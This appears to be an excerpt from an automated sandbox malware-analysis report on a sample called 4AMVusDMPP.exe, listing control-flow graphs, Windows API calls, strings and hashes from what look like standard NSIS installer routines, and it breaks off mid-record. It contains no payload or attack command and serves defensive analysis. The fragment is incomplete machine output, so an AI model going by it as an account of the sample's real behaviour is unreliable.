4036c0 56->64 75 40394a-403950 57->75 76 40382a-40383a call 405a4e ExitProcess 57->76 65 403804-40380b call 403ad8 58->65 66 403775-403780 call 405cea 58->66 60->47 60->61 61->47 72 4036d5 62->72 64->72 74 403810 65->74 77 403782-4037b7 66->77 78 4037ce-4037d8 66->78 72->29 74->57 80 403952-403968 GetCurrentProcess OpenProcessToken 75->80 81 4039ce-4039d6 75->81 82 4037b9-4037bd 77->82 85 403840-403854 call 4059b9 lstrcatW 78->85 86 4037da-4037e8 call 405dc5 78->86 88 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 80->88 89 40399e-4039ac call 4067c2 80->89 83 4039d8 81->83 84 4039dc-4039e0 ExitProcess 81->84 90 4037c6-4037ca 82->90 91 4037bf-4037c4 82->91 83->84 102 403861-40387b lstrcatW lstrcmpiW 85->102 103 403856-40385c lstrcatW 85->103 86->57 101 4037ea-403800 call 4063e8 * 2 86->101 88->89 99 4039ba-4039c5 ExitWindowsEx 89->99 100 4039ae-4039b8 89->100 90->82 95 4037cc 90->95 91->90 91->95 95->78 99->81 104 4039c7-4039c9 call 40140b 99->104 100->99 100->104 101->65 102->57 106 40387d-403880 102->106 103->102 104->81 110 403882-403887 call 40591f 106->110 111 403889 call 40599c 106->111 116 40388e-40389c SetCurrentDirectoryW 110->116 111->116 118 4038a9-4038d2 call 4063e8 116->118 119 40389e-4038a4 call 4063e8 116->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 128 40393e-403945 call 4061ae 126->128 127->126 129 403907-403927 call 4061ae call 40640a call 4059d1 127->129 128->57 129->126 138 403929-403930 CloseHandle 129->138 138->126
                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 004034C8
                                                          • GetVersion.KERNEL32 ref: 004034CE
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                          • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                          • OleInitialize.OLE32(00000000), ref: 00403545
                                                          • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                          • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                          • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                            • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                            • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                          • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                            • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                          • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                          • ExitProcess.KERNEL32 ref: 0040383A
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                          • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\4AMVusDMPP.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                          • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                          • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                          • ExitProcess.KERNEL32 ref: 004039E0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                          • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\4AMVusDMPP.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                          • API String ID: 3441113951-3530454843
                                                          • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                          • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                          • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                          • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 139 404dcc-404e18 GetDlgItem * 2 140 405039-405040 139->140 141 404e1e-404eb2 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 405042-405052 140->142 143 405054 140->143 144 404ec1-404ec8 DeleteObject 141->144 145 404eb4-404ebf SendMessageW 141->145 146 405057-405060 142->146 143->146 147 404eca-404ed2 144->147 145->144 148 405062-405065 146->148 149 40506b-405071 146->149 150 404ed4-404ed7 147->150 151 404efb-404eff 147->151 148->149 155 40514f-405156 148->155 152 405080-405087 149->152 153 405073-40507a 149->153 156 404ed9 150->156 157 404edc-404ef9 call 40640a SendMessageW * 2 150->157 151->147 154 404f01-404f2d call 40435f * 2 151->154 159 405089-40508c 152->159 160 4050fc-4050ff 152->160 153->152 153->155 195 404f33-404f39 154->195 196 404ff8-40500b GetWindowLongW SetWindowLongW 154->196 162 4051c7-4051cf 155->162 163 405158-40515e 155->163 156->157 157->151 168 405097-4050ac call 404d1a 159->168 169 40508e-405095 159->169 160->155 164 405101-40510b 160->164 166 4051d1-4051d7 SendMessageW 162->166 167 4051d9-4051e0 162->167 171 405164-40516e 163->171 172 4053af-4053c1 call 4043c6 163->172 174 40511b-405125 164->174 175 40510d-405119 SendMessageW 164->175 166->167 176 4051e2-4051e9 167->176 177 405214-40521b 167->177 168->160 194 4050ae-4050bf 168->194 169->160 169->168 171->172 180 405174-405183 SendMessageW 171->180 174->155 182 405127-405131 174->182 175->174 183 4051f2-4051f9 176->183 184 4051eb-4051ec ImageList_Destroy 176->184 187 405371-405378 177->187 188 405221-40522d call 4011ef 177->188 180->172 189 405189-40519a SendMessageW 180->189 190 405142-40514c 182->190 191 405133-405140 182->191 192 405202-40520e 183->192 193 4051fb-4051fc GlobalFree 183->193 184->183 187->172 200 40537a-405381 187->200 213 40523d-405240 188->213 214 40522f-405232 188->214 198 4051a4-4051a6 189->198 199 40519c-4051a2 189->199 190->155 191->155 192->177 193->192 194->160 202 4050c1-4050c3 194->202 203 404f3c-404f43 195->203 201 405011-405015 196->201 205 4051a7-4051c0 call 401299 SendMessageW 198->205 199->198 199->205 200->172 206 405383-4053ad ShowWindow GetDlgItem ShowWindow 200->206 207 405017-40502a ShowWindow call 404394 201->207 208 40502f-405037 call 404394 201->208 209 4050c5-4050cc 202->209 210 4050d6 202->210 211 404fd9-404fec 203->211 212 404f49-404f71 203->212 205->162 206->172 207->172 208->140 222 4050d2-4050d4 209->222 223 4050ce-4050d0 209->223 226 4050d9-4050f5 call 40117d 210->226 211->203 217 404ff2-404ff6 211->217 224 404f73-404fa9 SendMessageW 212->224 225 404fab-404fad 212->225 218 405281-4052a5 call 4011ef 213->218 219 405242-40525b call 4012e2 call 401299 213->219 227 405234 214->227 228 405235-405238 call 404d9a 214->228 217->196 217->201 241 405347-40535b InvalidateRect 218->241 242 4052ab 218->242 246 40526b-40527a SendMessageW 219->246 247 40525d-405263 219->247 222->226 223->226 224->211 234 404fc0-404fd6 SendMessageW 225->234 235 404faf-404fbe SendMessageW 225->235 226->160 227->228 228->213 234->211 235->211 241->187 244 40535d-40536c call 404ced call 404cd5 241->244 245 4052ae-4052b9 242->245 244->187 248 4052bb-4052ca 245->248 249 40532f-405341 245->249 246->218 253 405265 247->253 254 405266-405269 247->254 251 4052cc-4052d9 248->251 252 4052dd-4052e0 248->252 249->241 249->245 251->252 256 4052e2-4052e5 252->256 257 4052e7-4052f0 252->257 253->254 254->246 254->247 259 4052f5-40532d SendMessageW * 2 256->259 257->259 260 4052f2 257->260 259->249 260->259
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                          • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                          • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                          • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                          • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                          • GlobalFree.KERNEL32(?), ref: 004051FC
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                          • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                          • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                          • ShowWindow.USER32(00000000), ref: 004053AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                          • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                          • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                          • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 574 405afa-405b20 call 405dc5 577 405b22-405b34 DeleteFileW 574->577 578 405b39-405b40 574->578 579 405cb6-405cba 577->579 580 405b42-405b44 578->580 581 405b53-405b63 call 4063e8 578->581 582 405c64-405c69 580->582 583 405b4a-405b4d 580->583 589 405b72-405b73 call 405d09 581->589 590 405b65-405b70 lstrcatW 581->590 582->579 585 405c6b-405c6e 582->585 583->581 583->582 587 405c70-405c76 585->587 588 405c78-405c80 call 40672b 585->588 587->579 588->579 598 405c82-405c96 call 405cbd call 405ab2 588->598 591 405b78-405b7c 589->591 590->591 594 405b88-405b8e lstrcatW 591->594 595 405b7e-405b86 591->595 597 405b93-405baf lstrlenW FindFirstFileW 594->597 595->594 595->597 599 405bb5-405bbd 597->599 600 405c59-405c5d 597->600 614 405c98-405c9b 598->614 615 405cae-405cb1 call 405450 598->615 603 405bdd-405bf1 call 4063e8 599->603 604 405bbf-405bc7 599->604 600->582 602 405c5f 600->602 602->582 616 405bf3-405bfb 603->616 617 405c08-405c13 call 405ab2 603->617 606 405bc9-405bd1 604->606 607 405c3c-405c4c FindNextFileW 604->607 606->603 610 405bd3-405bdb 606->610 607->599 613 405c52-405c53 FindClose 607->613 610->603 610->607 613->600 614->587 620 405c9d-405cac call 405450 call 4061ae 614->620 615->579 616->607 621 405bfd-405c06 call 405afa 616->621 626 405c34-405c37 call 405450 617->626 627 405c15-405c18 617->627 620->579 621->607 626->607 630 405c1a-405c2a call 405450 call 4061ae 627->630 631 405c2c-405c32 627->631 630->607 631->607
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405B23
                                                          • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405B6B
                                                          • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405B8E
                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405B94
                                                          • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405BA4
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                          • FindClose.KERNEL32(00000000), ref: 00405C53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: 0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-3984366992
                                                          • Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                          • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                          • Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                          • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                          • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                          • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                          • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,774D2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,774D2EE0), ref: 00406736
                                                          • FindClose.KERNEL32(00000000), ref: 00406742
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: xgB
                                                          • API String ID: 2295610775-399326502
                                                          • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                          • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                          • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                          • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 261 403e86-403e98 262 403fd9-403fe8 261->262 263 403e9e-403ea4 261->263 265 404037-40404c 262->265 266 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 262->266 263->262 264 403eaa-403eb3 263->264 269 403eb5-403ec2 SetWindowPos 264->269 270 403ec8-403ecb 264->270 267 40408c-404091 call 4043ab 265->267 268 40404e-404051 265->268 266->265 283 404096-4040b1 267->283 273 404053-40405e call 401389 268->273 274 404084-404086 268->274 269->270 276 403ee5-403eeb 270->276 277 403ecd-403edf ShowWindow 270->277 273->274 296 404060-40407f SendMessageW 273->296 274->267 282 40432c 274->282 279 403f07-403f0a 276->279 280 403eed-403f02 DestroyWindow 276->280 277->276 287 403f0c-403f18 SetWindowLongW 279->287 288 403f1d-403f23 279->288 285 404309-40430f 280->285 286 40432e-404335 282->286 290 4040b3-4040b5 call 40140b 283->290 291 4040ba-4040c0 283->291 285->282 298 404311-404317 285->298 287->286 294 403fc6-403fd4 call 4043c6 288->294 295 403f29-403f3a GetDlgItem 288->295 290->291 292 4040c6-4040d1 291->292 293 4042ea-404303 DestroyWindow EndDialog 291->293 292->293 300 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 292->300 293->285 294->286 301 403f59-403f5c 295->301 302 403f3c-403f53 SendMessageW IsWindowEnabled 295->302 296->286 298->282 299 404319-404322 ShowWindow 298->299 299->282 331 404126-40412b 300->331 332 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 300->332 305 403f61-403f64 301->305 306 403f5e-403f5f 301->306 302->282 302->301 310 403f72-403f77 305->310 311 403f66-403f6c 305->311 309 403f8f-403f94 call 404338 306->309 309->294 314 403fad-403fc0 SendMessageW 310->314 316 403f79-403f7f 310->316 311->314 315 403f6e-403f70 311->315 314->294 315->309 319 403f81-403f87 call 40140b 316->319 320 403f96-403f9f call 40140b 316->320 327 403f8d 319->327 320->294 329 403fa1-403fab 320->329 327->309 329->327 331->332 335 40416c-40416d 332->335 336 40416f 332->336 337 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 4041a1-4041b2 SendMessageW 337->338 339 4041b4 337->339 340 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 338->340 339->340 340->283 351 4041ff-404201 340->351 351->283 352 404207-40420b 351->352 353 40422a-40423e DestroyWindow 352->353 354 40420d-404213 352->354 353->285 356 404244-404271 CreateDialogParamW 353->356 354->282 355 404219-40421f 354->355 355->283 357 404225 355->357 356->285 358 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->282 358->282 363 4042d0-4042e8 ShowWindow call 4043ab 358->363 363->285
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                          • ShowWindow.USER32(?), ref: 00403EDF
                                                          • DestroyWindow.USER32 ref: 00403EF3
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                          • GetDlgItem.USER32(?,?), ref: 00403F30
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                          • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                          • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                          • ShowWindow.USER32(00000000,?), ref: 00404135
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                          • EnableWindow.USER32(?,?), ref: 00404162
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                          • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                          • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                          • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                          • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID: (7B
                                                          • API String ID: 3282139019-3251261122
                                                          • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                          • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
